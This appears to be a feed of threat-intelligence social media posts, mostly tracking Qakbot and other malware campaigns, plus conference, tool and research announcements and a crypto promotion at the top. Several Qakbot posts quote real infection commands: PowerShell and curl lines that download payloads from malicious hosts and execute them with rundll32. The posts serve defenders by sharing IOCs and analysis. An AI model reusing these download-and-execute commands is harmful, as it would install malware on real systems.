🔥The 9th Round of Easy Loan, Earn $40 Reward is in progress❗️ ⏰ Promotion Period: January 15th - Feburary 15th, 2025 👉 Register now and check more details at gate.io/campaigns/358

#Qakbot - azd - .zip > .wsf > (decoy .pdf) > .dll WScript.exe Adobe Cloud Certificate 133337.wsf rundll32.exe C:\ProgramData\Z6x9E9.SmcisaK,Wind Samples 👇 bazaar.abuse.ch/sample/1b3b1a8… bazaar.abuse.ch/sample/e99726f… IOC's github.com/pr0xylife/Qakb…

#Qakbot - tok01 - .one > .ps > .dll > (decoy .pdf) cmd.exe /c ngops.bat poweRshell -C iwr http://waojernote.]com/images/1.gif -o C:\ProgramData\lesian.dat poweRshell -C Start-Sleep 12 rundll32 C:\ProgramData\lesian.dat,Wind IOC's github.com/pr0xylife/Qakb…

#Qakbot - BB15 - .one > .jse > .bat > .ps > .dll WScript.exe Open.jse cmd.exe /c default.bat powershell iwr -uri http://104.236.1.43/YXF/150223.gif -o %temp%\aTgzWLspf.tmp RunDLL32 %temp%\aTgzWLspf.tmp,Wind IOC's github.com/pr0xylife/Qakb…

#Qakbot - tok01 - .one > .wsf > .cmd > ps > .dll WScript.exe Open.wsf cmd.exe /c r.cmd poweRshell.exe -C iwr http://baracundofres.]com/images/150223.gif -OutFile rei.dat poweRshell.exe -C Start-Sleep 11 rundll32.exe rei.dat,Wind IOC's github.com/pr0xylife/Qakb…

Again today, I received emails leading to an (as yet, still) unidentified #malware sample. Pretty heavily obfuscated scripts - fun puzzles. Here's what I saw: github.com/executemalware…

#Qakbot - BB15 - .one > .wsf > curl > .dll wscript.exe mikey.wsf cmd.exe /c curl -o fd.dll http://64.225.8.]202/1Moch7/160223 && rundll32 fd.dll,N115 Samples 👇 bazaar.abuse.ch/sample/f836077… bazaar.abuse.ch/sample/6f99171… IOC's github.com/pr0xylife/Qakb…

The #Botconf2024 CFP is now available (sorry for the little delay) and the deadline is the same: 1st December 2023. botconf.eu/call-for-propo…

#QakBot's summer break through the lens of NetFlow data The attached image charts traffic volumes from QakBot C2s to their upstream Tier 2 servers located in #Russia Based on our visibility, things began to go quiet after 2 June (spamming ceased later) ☀️🍹🏖️ #PureSignal #PTO

BLOG POST: Part 2 of our high-level tracking of #QakBot infrastructure. Characterising #C2 servers and their relationship with the upstream hosts (located in 🇷🇺) used to manage them. team-cymru.com/post/visualizi…

#Qakbot 👇 youtube.com/watch?si=je_G2…

Hello Fox-IT , is there a place (Discord or something else) to exchange about Dissect ? Thank you

#TA577 - Back on the scene pushing #Darkgate Time to resume tracking operations, welcome back Tramp. Distro 👇 url > zip > lnk url > xll pdf > url > xll > msi Samples 👇 bazaar.abuse.ch/sample/026f4c9… bazaar.abuse.ch/sample/2eee7af… bazaar.abuse.ch/sample/bb2434f… bazaar.abuse.ch/sample/5bc060b…

The whole gang got up for this one to wrap up on TA422 (aka APT28, Fancy Bear, Forest Blizzard, FROZENLAKE, BlueDelta, Sednit, etc.) spraying n-day exploits August through November proofpoint.com/us/blog/threat… TL,DR:

How much do you know about IIS Machine Keys and View State? Are you confident you could not only identify an exploited host but also remediate it? If not, check out my new blog post which covers exploitation, detection and remediation zeroed.tech/blog/viewstate…

Seika.io is now in open beta. 🚀 We're a new internet listener aiming at providing threat intelligence context thanks to our sensors around the globe. seika.io/blog/2024/08/l…

🎉 IRIS 2.4.12 is out now, bringing a shiny new module for Seika.io, enhanced webhook capabilities, spelling in editors! 🚀 Check it out here: docs.dfir-iris.org/2.4.12/changel… and Seika.io

Simone Margaritelli We're already seeing some scanning and exploitation attempts. 🔥

Give this a look, it’s called GHOSTS, it allows you to simulate/automate different types of user traffic/activities. Normally used cybersecurity testing, it might work for what you need. github.com/cmu-sei/GHOSTS

🎉 DFIR Labs CTF Winners🎉 We’re thrilled to announce the winners of our latest CTF: 🏆 1st Place: Security Boi 🥈 2nd Place: Satyender Yadav 🥉 3rd Place: p500 A big thank you to all participants and supporters for making this event a success!

Expression payloads meet mayhem in this week's Ivanti EPMM vulnerabilities — CVE-2025-4427 and CVE-2025-4428 — chained to achieve unauth RCE. Beware - this is currently being exploited ITW! Enjoy our analysis. labs.watchtowr.com/expression-pay…